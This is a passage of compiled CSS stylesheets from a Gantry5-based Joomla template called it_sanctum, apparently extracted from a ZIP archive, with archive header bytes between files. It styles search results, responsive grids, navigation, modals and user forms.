.footer .ns2-page-inner-custom .ns2-first .ns2-column > div {
  padding-top: 0 !important;
}
.search .search-form-results {
  width: 500px;
  margin: 0 auto;
  text-align: center;
  padding: 50px;
  border: 1px solid #dddddd;
  margin-bottom: 70px;
}
@media only all and (max-width: 47.99rem) {
  .search .search-form-results {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .search .search-form-results {
    width: 100%;
  }
}
.search .search-form-results .btn-toolbar {
  margin-top: 0;
}
.search .search-form-results .btn-toolbar .btn-group {
  float: none;
  margin: 0;
}
.search .search-form-results .btn-toolbar .btn-group input {
  width: 100%;
  margin: 0;
  border-right: none;
}
@media only all and (max-width: 30rem) {
  .search .search-form-results .btn-toolbar .btn-group input {
    width: 120px;
  }
}
.search .search-form-results .btn-toolbar .btn-group .btn {
  padding: 0.58rem 1rem !important;
  border-radius: 0 !important;
}
.search .search-form-results .btn-toolbar .btn-group .btn > span {
  vertical-align: middle;
  margin: 0;
}
.search .search-form-results .searchintro > p {
  margin-bottom: 0;
}
.search .search-form-results .searchintro .badge {
  background: #4f953b;
  border-radius: 0;
  text-shadow: none;
}
.search .search-add-options {
  padding: 50px;
  border: 1px solid #dddddd;
  margin: 0 auto 50px;
  width: 600px;
}
@media only all and (max-width: 47.99rem) {
  .search .search-add-options {
    width: 100%;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .search .search-add-options {
    width: 100%;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.99rem) {
  .search .search-add-options {
    width: 550px;
  }
}
.search .search-add-options > fieldset {
  display: inline-block;
}
.search .search-add-options > fieldset:first-child {
  margin-right: 50px;
}
@media only all and (max-width: 47.99rem) {
  .search .search-add-options > fieldset:first-child {
    margin-bottom: 50px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .search .search-add-options > fieldset:first-child {
    margin-bottom: 50px;
  }
}
.search .search-results .result-item {
  padding: 40px 0 40px 50px;
  border-top: 1px solid #dddddd;
  position: relative;
}
.search .search-results .result-item .item-number {
  position: absolute;
  left: 0;
  border: 1px solid #dddddd;
  text-align: center;
  width: 30px;
  height: 30px;
  line-height: 30px;
  border-radius: 0;
}
.search .search-results .result-item .result-title {
  line-height: 30px;
}
.search .search-results .result-item .result-title h4 a {
  color: #282828;
}
.search .search-results .result-item .result-title h4 a:hover {
  color: #4f953b;
}
.search .search-results .result-item dd {
  margin: 0;
}
.search .search-results .result-item .search-item-info {
  margin-top: 20px;
}
.search .search-results .result-item .search-item-info dd {
  display: inline-block;
  margin-right: 20px;
}
.search .search-results .result-item .search-item-info dd i {
  margin-right: 7px;
}
.uk-dotnav > * > *, .uk-dotnav-contrast > * > * {
  border-radius: 0px !important;
  background: rgba(0, 0, 0, 0.1) !important;
}
.uk-dotnav > .uk-active > *, .uk-dotnav-contrast > .uk-active > * {
  background: rgba(0, 0, 0, 0.2) !important;
}
.g-container .uk-slidenav-position .uk-slidenav {
  border-radius: 0;
  background: transparent;
  font-size: 50px;
  color: rgba(0, 0, 0, 0.3);
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
.g-container .uk-slidenav-position .uk-slidenav:hover {
  color: #4f953b;
}
.uk-modal .uk-slidenav-position .uk-slidenav {
  border-radius: 0;
  background: transparent;
  font-size: 50px;
  color: rgba(0, 0, 0, 0.3);
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
.uk-modal .uk-slidenav-position .uk-slidenav:hover {
  color: #4f953b;
}
.uk-grid-divider > * {
  padding-left: 35px !important;
  margin-bottom: 20px !important;
}
@media only all and (max-width: 47.99rem) {
  .navbar-fixed-top, .navbar-fixed-bottom, .navbar-static-top {
    margin-right: -20px;
    margin-left: -20px;
  }
  .container-fluid {
    padding: 0;
  }
  .dl-horizontal dt {
    float: none;
    width: auto;
    clear: none;
    text-align: left;
  }
  .dl-horizontal dd {
    margin-left: 0;
  }
  .row-fluid {
    width: 100%;
  }
  .row, .thumbnails {
    margin-left: 0;
  }
  .thumbnails > li {
    float: none;
    margin-left: 0;
  }
  .manager.thumbnails > li {
    float: left;
    margin-left: 20px;
  }
  [class*="span"], .uneditable-input[class*="span"], .row-fluid [class*="span"] {
    display: block;
    float: none;
    width: 100%;
    margin-left: 0;
    box-sizing: border-box;
  }
  .span12, .row-fluid .span12 {
    width: 100%;
    box-sizing: border-box;
  }
  .row-fluid [class*="offset"]:first-child {
    margin-left: 0;
  }
  .input-large, .input-xlarge, .input-xxlarge, input[class*="span"], select[class*="span"], textarea[class*="span"], .uneditable-input {
    display: block;
    width: 100%;
    min-height: 30px;
    box-sizing: border-box;
  }
  .input-prepend input, .input-append input, .input-prepend input[class*="span"], .input-append input[class*="span"] {
    display: inline-block;
    width: auto;
  }
  .controls-row [class*="span"] + [class*="span"] {
    margin-left: 0;
  }
}
@media only all and (max-width: 30rem) {
  .nav-collapse {
    -webkit-transform: translate3d(0, 0, 0);
  }
  .page-header h1 small {
    display: block;
    line-height: 20px;
  }
  .form-horizontal .control-label {
    float: none;
    width: auto;
    padding-top: 0;
    text-align: left;
  }
  .form-horizontal .controls {
    margin-left: 0;
  }
  .form-horizontal .control-list {
    padding-top: 0;
  }
  .form-horizontal .form-actions {
    padding-right: 10px;
    padding-left: 10px;
  }
  .media .pull-left, .media .pull-right {
    display: block;
    float: none;
    margin-bottom: 10px;
  }
  .media-object {
    margin-right: 0;
    margin-left: 0;
  }
  .modal-header .close {
    padding: 10px;
    margin: -10px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .row {
    margin-left: -20px;
  }
  .row:before, .row:after {
    display: table;
    line-height: 0;
    content: "";
  }
  .row:after {
    clear: both;
  }
  [class*="span"] {
    float: left;
    min-height: 1px;
    margin-left: 20px;
  }
  .span12 {
    width: 724px;
  }
  .span11 {
    width: 662px;
  }
  .span10 {
    width: 600px;
  }
  .span9 {
    width: 538px;
  }
  .span8 {
    width: 476px;
  }
  .span7 {
    width: 414px;
  }
  .span6 {
    width: 352px;
  }
  .span5 {
    width: 290px;
  }
  .span4 {
    width: 228px;
  }
  .span3 {
    width: 166px;
  }
  .span2 {
    width: 104px;
  }
  .span1 {
    width: 42px;
  }
  .offset12 {
    margin-left: 764px;
  }
  .offset11 {
    margin-left: 702px;
  }
  .offset10 {
    margin-left: 640px;
  }
  .offset9 {
    margin-left: 578px;
  }
  .offset8 {
    margin-left: 516px;
  }
  .offset7 {
    margin-left: 454px;
  }
  .offset6 {
    margin-left: 392px;
  }
  .offset5 {
    margin-left: 330px;
  }
  .offset4 {
    margin-left: 268px;
  }
  .offset3 {
    margin-left: 206px;
  }
  .offset2 {
    margin-left: 144px;
  }
  .offset1 {
    margin-left: 82px;
  }
  .row-fluid {
    width: 100%;
  }
  .row-fluid:before, .row-fluid:after {
    display: table;
    line-height: 0;
    content: "";
  }
  .row-fluid:after {
    clear: both;
  }
  .row-fluid [class*="span"] {
    display: block;
    float: left;
    width: 100%;
    min-height: 30px;
    margin-left: 2.7624309392%;
    box-sizing: border-box;
  }
  .row-fluid [class*="span"]:first-child {
    margin-left: 0;
  }
  .row-fluid .controls-row [class*="span"] + [class*="span"] {
    margin-left: 2.7624309392%;
  }
  .row-fluid .span12 {
    width: 100%;
  }
  .row-fluid .span11 {
    width: 91.4364640884%;
  }
  .row-fluid .span10 {
    width: 82.8729281768%;
  }
  .row-fluid .span9 {
    width: 74.3093922652%;
  }
  .row-fluid .span8 {
    width: 65.7458563536%;
  }
  .row-fluid .span7 {
    width: 57.182320442%;
  }
  .row-fluid .span6 {
    width: 48.6187845304%;
  }
  .row-fluid .span5 {
    width: 40.0552486188%;
  }
  .row-fluid .span4 {
    width: 31.4917127072%;
  }
  .row-fluid .span3 {
    width: 22.9281767956%;
  }
  .row-fluid .span2 {
    width: 14.364640884%;
  }
  .row-fluid .span1 {
    width: 5.8011049724%;
  }
  .row-fluid .offset12 {
    margin-left: 105.5248618785%;
  }
  .row-fluid .offset12:first-child {
    margin-left: 102.7624309392%;
  }
  .row-fluid .offset11 {
    margin-left: 96.9613259669%;
  }
  .row-fluid .offset11:first-child {
    margin-left: 94.1988950276%;
  }
  .row-fluid .offset10 {
    margin-left: 88.3977900552%;
  }
  .row-fluid .offset10:first-child {
    margin-left: 85.635359116%;
  }
  .row-fluid .offset9 {
    margin-left: 79.8342541436%;
  }
  .row-fluid .offset9:first-child {
    margin-left: 77.0718232044%;
  }
  .row-fluid .offset8 {
    margin-left: 71.270718232%;
  }
  .row-fluid .offset8:first-child {
    margin-left: 68.5082872928%;
  }
  .row-fluid .offset7 {
    margin-left: 62.7071823204%;
  }
  .row-fluid .offset7:first-child {
    margin-left: 59.9447513812%;
  }
  .row-fluid .offset6 {
    margin-left: 54.1436464088%;
  }
  .row-fluid .offset6:first-child {
    margin-left: 51.3812154696%;
  }
  .row-fluid .offset5 {
    margin-left: 45.5801104972%;
  }
  .row-fluid .offset5:first-child {
    margin-left: 42.817679558%;
  }
  .row-fluid .offset4 {
    margin-left: 37.0165745856%;
  }
  .row-fluid .offset4:first-child {
    margin-left: 34.2541436464%;
  }
  .row-fluid .offset3 {
    margin-left: 28.453038674%;
  }
  .row-fluid .offset3:first-child {
    margin-left: 25.6906077348%;
  }
  .row-fluid .offset2 {
    margin-left: 19.8895027624%;
  }
  .row-fluid .offset2:first-child {
    margin-left: 17.1270718232%;
  }
  .row-fluid .offset1 {
    margin-left: 11.3259668508%;
  }
  .row-fluid .offset1:first-child {
    margin-left: 8.5635359116%;
  }
  input, textarea, .uneditable-input {
    margin-left: 0;
  }
  .controls-row [class*="span"] + [class*="span"] {
    margin-left: 20px;
  }
  input.span12, textarea.span12, .uneditable-input.span12 {
    width: 710px;
  }
  input.span11, textarea.span11, .uneditable-input.span11 {
    width: 648px;
  }
  input.span10, textarea.span10, .uneditable-input.span10 {
    width: 586px;
  }
  input.span9, textarea.span9, .uneditable-input.span9 {
    width: 524px;
  }
  input.span8, textarea.span8, .uneditable-input.span8 {
    width: 462px;
  }
  input.span7, textarea.span7, .uneditable-input.span7 {
    width: 400px;
  }
  input.span6, textarea.span6, .uneditable-input.span6 {
    width: 338px;
  }
  input.span5, textarea.span5, .uneditable-input.span5 {
    width: 276px;
  }
  input.span4, textarea.span4, .uneditable-input.span4 {
    width: 214px;
  }
  input.span3, textarea.span3, .uneditable-input.span3 {
    width: 152px;
  }
  input.span2, textarea.span2, .uneditable-input.span2 {
    width: 90px;
  }
  input.span1, textarea.span1, .uneditable-input.span1 {
    width: 28px;
  }
}
@media only all and (max-width: 59.99rem) {
  .navbar-fixed-top, .navbar-fixed-bottom {
    position: static;
  }
  .navbar-fixed-top {
    margin-bottom: 20px;
  }
  .navbar-fixed-bottom {
    margin-top: 20px;
  }
  .navbar-fixed-top .navbar-inner, .navbar-fixed-bottom .navbar-inner {
    padding: 5px;
  }
  .navbar .container {
    width: auto;
    padding: 0;
  }
  .navbar .brand {
    padding-right: 10px;
    padding-left: 10px;
    margin: 0 0 0 -5px;
  }
  .nav-collapse {
    clear: both;
  }
  .nav-collapse .nav {
    float: none;
    margin: 0 0 10px;
  }
  .nav-collapse .nav > li {
    float: none;
  }
  .nav-collapse .nav > li > a {
    margin-bottom: 2px;
  }
  .nav-collapse .nav > .divider-vertical {
    display: none;
  }
  .nav-collapse .nav .nav-header {
    color: #777777;
    text-shadow: none;
  }
  .nav-collapse .nav > li > a, .nav-collapse .dropdown-menu a {
    padding: 9px 15px;
    font-weight: bold;
    color: #777777;
    border-radius: 0.1875rem;
  }
  .nav-collapse .btn {
    padding: 4px 10px 4px;
    font-weight: normal;
    border-radius: 0.1875rem;
  }
  .nav-collapse .dropdown-menu li + li a {
    margin-bottom: 2px;
  }
  .nav-collapse .nav > li > a:hover, .nav-collapse .nav > li > a:focus, .nav-collapse .dropdown-menu a:hover, .nav-collapse .dropdown-menu a:focus {
    background-color: #f2f2f2;
  }
  .navbar-inverse .nav-collapse .nav > li > a, .navbar-inverse .nav-collapse .dropdown-menu a {
    color: #999999;
  }
  .navbar-inverse .nav-collapse .nav > li > a:hover, .navbar-inverse .nav-collapse .nav > li > a:focus, .navbar-inverse .nav-collapse .dropdown-menu a:hover, .navbar-inverse .nav-collapse .dropdown-menu a:focus {
    background-color: #111111;
  }
  .nav-collapse.in .btn-group {
    padding: 0;
    margin-top: 5px;
  }
  .nav-collapse .dropdown-menu {
    position: static;
    top: auto;
    left: auto;
    display: none;
    float: none;
    max-width: none;
    padding: 0;
    margin: 0 15px;
    background-color: transparent;
    border: none;
    border-radius: 0;
    box-shadow: none;
  }
  .nav-collapse .open > .dropdown-menu {
    display: block;
  }
  .nav-collapse .dropdown-menu:before, .nav-collapse .dropdown-menu:after {
    display: none;
  }
  .nav-collapse .dropdown-menu .divider {
    display: none;
  }
  .nav-collapse .nav > li > .dropdown-menu:before, .nav-collapse .nav > li > .dropdown-menu:after {
    display: none;
  }
  .nav-collapse .navbar-form, .nav-collapse .navbar-search {
    float: none;
    padding: 10px 15px;
    margin: 10px 0;
    border-top: 1px solid #f2f2f2;
    border-bottom: 1px solid #f2f2f2;
    box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  }
  .navbar-inverse .nav-collapse .navbar-form, .navbar-inverse .nav-collapse .navbar-search {
    border-top-color: #111111;
    border-bottom-color: #111111;
  }
  .navbar .nav-collapse .nav.pull-right {
    float: none;
    margin-left: 0;
  }
  .nav-collapse, .nav-collapse.collapse {
    height: 0;
    overflow: hidden;
  }
  .navbar .btn-navbar {
    display: block;
  }
  .navbar-static .navbar-inner {
    padding-right: 10px;
    padding-left: 10px;
  }
}
@media only all and (min-width: 60rem) {
  .nav-collapse.collapse {
    height: auto !important;
    overflow: visible !important;
  }
}
@media only all and (max-width: 47.99rem) {
  .form-horizontal .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  .form-horizontal .controls {
    margin: 0;
  }
  [dir="rtl"] .form-horizontal .control-label {
    text-align: right;
  }
}
@media only all and (max-width: 47.99rem) {
  div.modal {
    position: fixed;
    top: 20px;
    right: 20px;
    left: 20px;
    width: auto;
    margin: 0;
  }
  div.modal.fade {
    top: -100px;
  }
  div.modal.fade.in {
    top: 20px;
  }
}
@media only all and (max-width: 30rem) {
  div.modal {
    top: 10px;
    right: 10px;
    left: 10px;
  }
}
@media only all and (max-width: 47.99rem) {
  .pull-right.item-image {
    margin-left: 0;
  }
  .pull-left.item-image {
    margin-right: 0;
  }
}
/*# sourceMappingURL=sanctum-joomla__error.css.map */PK!sy�Gdd)it_sanctum/custom/css-compiled/custom.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.

   WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!

   For more information on modifying CSS, please read:

   http://docs.gantry.org/gantry5/configure/styles
   http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

/* @import "custom.scss" */PK!.�:`  1it_sanctum/custom/css-compiled/sanctum-joomla.cssnu&1i�/* GANTRY5 DEVELOPMENT MODE ENABLED.

   WARNING: This file is automatically generated by Gantry5. Any modifications to this file will be lost!

   For more information on modifying CSS, please read:

   http://docs.gantry.org/gantry5/configure/styles
   http://docs.gantry.org/gantry5/tutorials/adding-a-custom-style-sheet
 */

/* line 2, media/gantry5/engines/nucleus/scss/nucleus/mixins/_nav.scss */
/* line 12, media/gantry5/engines/nucleus/scss/nucleus/mixins/_nav.scss */
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/mixins/_utilities.scss */
/* line 9, media/gantry5/engines/nucleus/scss/nucleus/mixins/_utilities.scss */
/* line 1, media/gantry5/engines/nucleus/scss/joomla/theme/_forms.scss */
legend {
  font-size: 1.3rem;
  line-height: 1.5;
}
/* line 6, media/gantry5/engines/nucleus/scss/joomla/theme/_forms.scss */
legend small {
  font-size: 0.8rem;
}
/* line 10, media/gantry5/engines/nucleus/scss/joomla/theme/_forms.scss */
.input-prepend > .add-on, .input-append > .add-on {
  line-height: 1.5;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.btn-group > .btn + .dropdown-toggle {
  box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1);
}
/* line 5, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.btn-group.open .btn-primary.dropdown-toggle {
  background: #458334;
  color: #fff;
  box-shadow: inset -1px -1px 1px rgba(0, 0, 0, 0.15);
}
/* line 11, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a {
  background-image: none;
  background-color: #4f953b;
}
/* line 16, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.btn-link {
  color: #4f953b;
}
/* line 21, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form {
  margin-bottom: 0;
}
/* line 23, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form #form-login-remember {
  margin: 20px 0 10px;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form #form-login-remember input {
  margin: 0 5px 0 0;
}
/* line 29, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form ul.unstyled {
  margin: 20px 0 0;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form ul.unstyled a {
  color: #282828;
}
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form ul.unstyled a:hover {
  color: #4f953b;
}
/* line 36, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
#login-form ul.unstyled a i {
  margin-right: 7px;
}
/* line 44, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 45, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu {
  margin: 0;
}
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li {
  margin-bottom: 6.5px;
}
/* line 49, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li:last-child {
  margin-bottom: 0;
}
/* line 52, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li a {
  color: #282828;
}
/* line 54, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li a:before {
  content: "\f105";
  font-family: FontAwesome;
  margin-right: 0.625rem;
}
/* line 59, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li a:hover {
  color: #4f953b;
}
/* line 63, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 64, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li span:before {
  content: "\f105";
  font-family: FontAwesome;
  margin-right: 0.625rem;
}
/* line 70, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li ul {
  margin-top: 6.5px;
  margin-bottom: 6.5px;
}
/* line 74, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 75, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.nav.menu li.current > a, .nav.menu li.current > span {
  color: #4f953b;
}
/* line 84, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.well {
  background: transparent;
  border: 1px solid #ddd;
  border-radius: 0;
  box-shadow: none;
  padding: 30px 30px 10px;
}
/* line 93, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 94, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 95, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 96, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 97, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.login > form fieldset .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 101, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.login > form fieldset .control-group #remember {
  margin-top: 10px;
}
@media only all and (max-width: 47.938rem) {
  .login > form fieldset .control-group #remember {
    width: auto;
  }
}
/* line 107, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
@media only all and (max-width: 47.938rem) {
  .login > form fieldset .control-group input {
    width: 100%;
  }
}
/* line 117, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 118, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.logout .controls {
  margin-left: 0;
}
/* line 123, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 124, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 125, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
ul.nav-tabs.nav-stacked > li > a {
  border-radius: 0 !important;
  border: 1px solid #ddd;
}
/* line 128, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
ul.nav-tabs.nav-stacked > li > a:hover {
  border: 1px solid #ddd;
}
/* line 136, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 137, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.registration #member-registration {
  margin-bottom: 0;
}
/* line 139, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.registration #member-registration legend + .control-group {
  margin-top: 0;
}
/* line 142, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 143, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.registration #member-registration .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 147, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
@media only all and (max-width: 47.938rem) {
  .registration #member-registration .control-group input {
    width: 100%;
  }
}
/* line 157, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 158, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.remind #user-registration, .reset #user-registration {
  margin-bottom: 0;
}
/* line 160, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 161, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.remind #user-registration fieldset p, .reset #user-registration fieldset p {
  margin-top: 0;
}
/* line 165, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 166, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.remind #user-registration .control-group .control-label, .reset #user-registration .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 175, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 176, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile > ul.btn-toolbar {
  margin-top: 0;
}
/* line 179, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile #users-profile-core {
  margin-bottom: 20px;
}
/* line 182, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 183, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 184, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile fieldset dl dt {
  text-align: left;
}
/* line 192, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 193, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile-edit #member-profile {
  margin-bottom: 0;
}
/* line 195, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
/* line 196, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile-edit #member-profile .control-group .control-label {
  text-align: left;
  padding-top: 10px;
}
/* line 200, templates/it_sanctum/scss/sanctum-joomla/_core.scss */
.profile-edit #member-profile .control-group .chzn-container {
  padding-top: 8px;
}
/* line 2, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped, .row-striped {
  border-top: 1px solid #ddd;
}
/* line 7, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped li, .list-striped dd, .row-striped .row, .row-striped .row-fluid {
  border-bottom: 1px solid #ddd;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped li:nth-child(odd), .list-striped dd:nth-child(odd), .row-striped .row:nth-child(odd), .row-striped .row-fluid:nth-child(odd) {
  background-color: #fcfcfc;
}
/* line 21, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-striped li:hover, .list-striped dd:hover, .row-striped .row:hover, .row-striped .row-fluid:hover {
  background-color: #f2f2f2;
}
/* line 28, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.list-bordered, .row-bordered {
  border: 1px solid #ddd;
}
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.row-even, .row-odd {
  border-bottom: 1px solid #ddd;
}
/* line 38, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.row-even {
  background-color: #fcfcfc;
}
/* line 42, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
.iframe-bordered {
  border: 1px solid #ddd;
}
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
blockquote {
  border-left: 5px solid #ddd;
}
/* line 52, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
blockquote small {
  color: #c8c8c8;
}
/* line 56, templates/it_sanctum/scss/sanctum-joomla/_typography.scss */
blockquote.pull-right {
  border-right: 5px solid #ddd;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
legend {
  color: #333;
}
/* line 5, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
legend small {
  color: #999;
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
.input-prepend .chzn-container-single .chzn-single, .input-append .chzn-container-single .chzn-single {
  border-color: #ddd;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
.input-prepend .chzn-container-single .chzn-drop, .input-append .chzn-container-single .chzn-drop {
  border-color: #ddd;
}
/* line 19, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
textarea, input[type="text"], input[type="password"], input[type="datetime"], input[type="datetime-local"], input[type="date"], input[type="month"], input[type="time"], input[type="week"], input[type="number"], input[type="email"], input[type="url"], input[type="search"], input[type="tel"], input[type="color"], .uneditable-input {
  background-color: #fff;
  border: 1px solid #d5d5d5;
  box-shadow: none;
  padding: 10px;
  border-radius: 0;
  -webkit-transition: border 0.2s linear, box-shadow 0.2s linear;
  -moz-transition: border 0.2s linear, box-shadow 0.2s linear;
  transition: border 0.2s linear, box-shadow 0.2s linear;
}
/* line 41, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
textarea:focus, input[type="text"]:focus, input[type="password"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="date"]:focus, input[type="month"]:focus, input[type="time"]:focus, input[type="week"]:focus, input[type="number"]:focus, input[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus, .uneditable-input:focus {
  box-shadow: none;
}
/* line 46, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 47, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-aside input, #g-sidebar input, #g-offcanvas input, #g-aside textarea, #g-sidebar textarea, #g-offcanvas textarea, #g-aside .uneditable-input, #g-sidebar .uneditable-input, #g-offcanvas .uneditable-input {
  width: 100%;
}
/* line 50, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-aside input[type="file"], #g-sidebar input[type="file"], #g-offcanvas input[type="file"], #g-aside input[type="image"], #g-sidebar input[type="image"], #g-offcanvas input[type="image"], #g-aside input[type="submit"], #g-sidebar input[type="submit"], #g-offcanvas input[type="submit"], #g-aside input[type="reset"], #g-sidebar input[type="reset"], #g-offcanvas input[type="reset"], #g-aside input[type="button"], #g-sidebar input[type="button"], #g-offcanvas input[type="button"], #g-aside input[type="radio"], #g-sidebar input[type="radio"], #g-offcanvas input[type="radio"], #g-aside input[type="checkbox"], #g-sidebar input[type="checkbox"], #g-offcanvas input[type="checkbox"] {
  width: auto;
}
/* line 55, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 56, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 57, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-header .search form, #g-navigation .search form {
  margin-bottom: 0;
}
/* line 60, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
#g-header .search input, #g-navigation .search input {
  margin-bottom: 0;
  border: 0;
}
/* line 68, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
/* line 69, templates/it_sanctum/scss/sanctum-joomla/_forms.scss */
.view-mailto #g-page-surround, .body-only #g-page-surround {
  box-shadow: none;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark {
  border-bottom: 1px solid #333;
  text-shadow: 1px 1px 1px #000;
}
/* line 6, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark > li > a {
  color: #f8f8f8;
}
/* line 10, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark > li > a:hover {
  border-color: #333 #333 #111;
  background-color: #777;
}
/* line 15, templates/it_sanctum/scss/sanctum-joomla/_tabs.scss */
.nav-tabs.nav-dark > .active > a, .nav-tabs.nav-dark > .active > a:hover {
  color: #fff;
  background-color: #555;
  border: 1px solid #222;
}
/* line 3, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.tip-wrap {
  color: #fff;
  background-color: #000;
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.search span.highlight {
  background-color: #fcfcfc;
}
/* line 14, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.img-polaroid {
  background-color: #fff;
  border: 1px solid rgba(0, 0, 0, 0.2);
  box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
}
/* line 21, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.muted {
  color: #999;
}
/* line 25, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
a.muted:hover, a.muted:focus {
  color: #808080;
}
/* line 30, templates/it_sanctum/scss/sanctum-joomla/_utilities.scss */
.alert {
